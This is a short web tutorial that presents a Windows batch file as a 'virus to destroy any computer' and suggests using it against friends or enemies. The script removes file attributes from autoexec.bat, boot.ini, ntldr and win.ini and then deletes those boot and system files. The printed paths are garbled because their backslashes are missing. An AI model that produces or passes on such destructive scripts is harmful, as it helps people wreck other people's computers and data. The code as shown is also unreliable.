
Trick to make a Virus to destroy any Computer

Learn how to make a powerful virus which can destroy any computer fully.

Computer Destroyed
The disaster of Virus can be so much terrible that it can even destroy any computer. So to make this kind of, there is trick to make a virus which can destroy any computer. This trick can be used to annoy the friends or enemy.

Note: Don't run this program on your computer otherwise you will lose your windows.  I am not responsible for any accident caused by this file on your computer.

Here is a trick to make a virus which can destroy any computer:
  • Open notepad.
  • Copy and paste the following code into notepad :
@echo off
Attrib -r -s -h c:autoexec.bat
Del c:autoexec.bat
Attrib -r -s -h c:boot.ini
Del c:boot.ini
Attrib -r -s -h c:ntldr
Del c:ntldr
Attrib -r -s -h c:windowswin.ini
Del c:windowswin.ini
  • Save it as destroycomputer.bat.
  • Now it is done.
So it is a simple trick to make a virus which can destroy any computer.

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